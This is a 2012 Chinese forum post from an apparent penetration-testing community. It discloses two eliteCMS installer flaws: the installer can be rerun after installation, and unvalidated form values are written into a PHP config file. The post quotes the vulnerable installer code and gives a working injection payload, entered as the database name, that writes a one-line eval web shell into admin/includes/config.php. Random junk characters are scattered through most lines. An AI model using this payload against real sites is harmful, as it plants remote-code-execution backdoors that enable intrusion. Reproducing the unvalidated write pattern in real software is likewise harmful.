中国网络渗透测试联盟

标题: eliteCMS安装文件未验证 + 一句话写入安全漏洞 [打印本页]
作者: admin    时间: 2012-11-18 13:59
标题: eliteCMS安装文件未验证 + 一句话写入安全漏洞
eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装) x0 O: l/ X' Y, _& K" }0 K- [

; N& I% Z* ^7 ?' }另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php: X# U& P3 [2 l. y
我们来看代码:
  n& a6 u0 x! I' V 5 b; I' b1 g5 P1 X2 r
...
1 l- e9 \6 d  Belseif ($_GET['step'] == "4") {
6 O8 l' Z( |% S( I! {, d+ Z8 p    $file = "../admin/includes/config.php";
# m: |) y7 z, y    $write = "<?php\n";
* V* E1 k' p" b8 B% T    $write .= "/**\n";7 g/ v) N/ o( |
    $write .= "*\n";
/ R- X  t) q& w$ d8 I! O% a3 Y; E+ f    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";3 x2 H) }8 o5 s" f" m
...略..., m6 J  N/ D4 F
    $write .= "*\n";  R- E. F0 y: }4 B; \* c- P
    $write .= "*/\n";" p. f, l9 H5 w
    $write .= "\n";; i8 {% X6 i& O/ B) i
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
' V, i! h* |6 o! X    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
6 z+ H6 H4 ^. H    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";1 d/ ]$ `. h/ x" Z/ a: W  y
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
$ }; Z2 b4 x9 {9 u    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";7 I, L; K* t2 b: |3 }0 F
    $write .= "if (!\$connection) {\n";
, ?2 m6 i& g1 P$ l: V7 f    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
- }5 Y, Q' q0 C2 V/ E# m    $write .= "        \n";4 M7 z7 ]/ J0 a; s/ o
    $write .= "} \n";) P0 N$ I( Y# x% a$ n: W
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
7 w1 ?) G9 M! c- N, M7 ]" T    $write .= "if (!\$db_select) {\n";
; F$ V2 j0 E% i& P% v9 S7 Q    $write .= "        die(\"Database select failed\" .mysql_error());\n";
+ k8 @, A9 h) Q    $write .= "        \n";
2 \( c, D$ G% b) c0 H) _/ G    $write .= "} \n";! j# Z& e1 t4 b+ R
    $write .= "?>\n";
/ W" b4 y1 H6 B
& P- m; _' x: F3 p6 n    $writer = fopen($file, 'w');; a% o  ?2 {% q' @+ J* ]; p
...
4 n3 {& D+ I7 Z7 b; i$ U$ c! W# \ * d7 G% m4 ^6 m
在看代码:
8 u$ J* n. R( K* z8 u+ I; F ; r/ j1 S$ O7 A
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
7 t( y) d' v! ^+ K# I9 u9 d# Z$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
4 q% l$ a1 a- ?3 K- O$_SESSION['DB_USER'] = $_POST['DB_USER'];
* x: D% k- ], [$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
. X! `% y$ a6 n8 X0 r+ m0 M 5 ^: r* v& |& K/ H
取值未作任何验证
* v9 v3 e2 {  w; e' G如果将数据库名POST数据:7 X! Z9 {' O+ j( H' V

% b1 A* g; Z2 |0 m+ ~1 \2 y) a"?><?php eval($_POST[c]);?><?php
( l' P+ h3 D0 B6 l* p: f ) s, B* x# b! m7 H
将导致一句话后门写入/admin/includes/config.php
# n4 z& o+ G' U



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2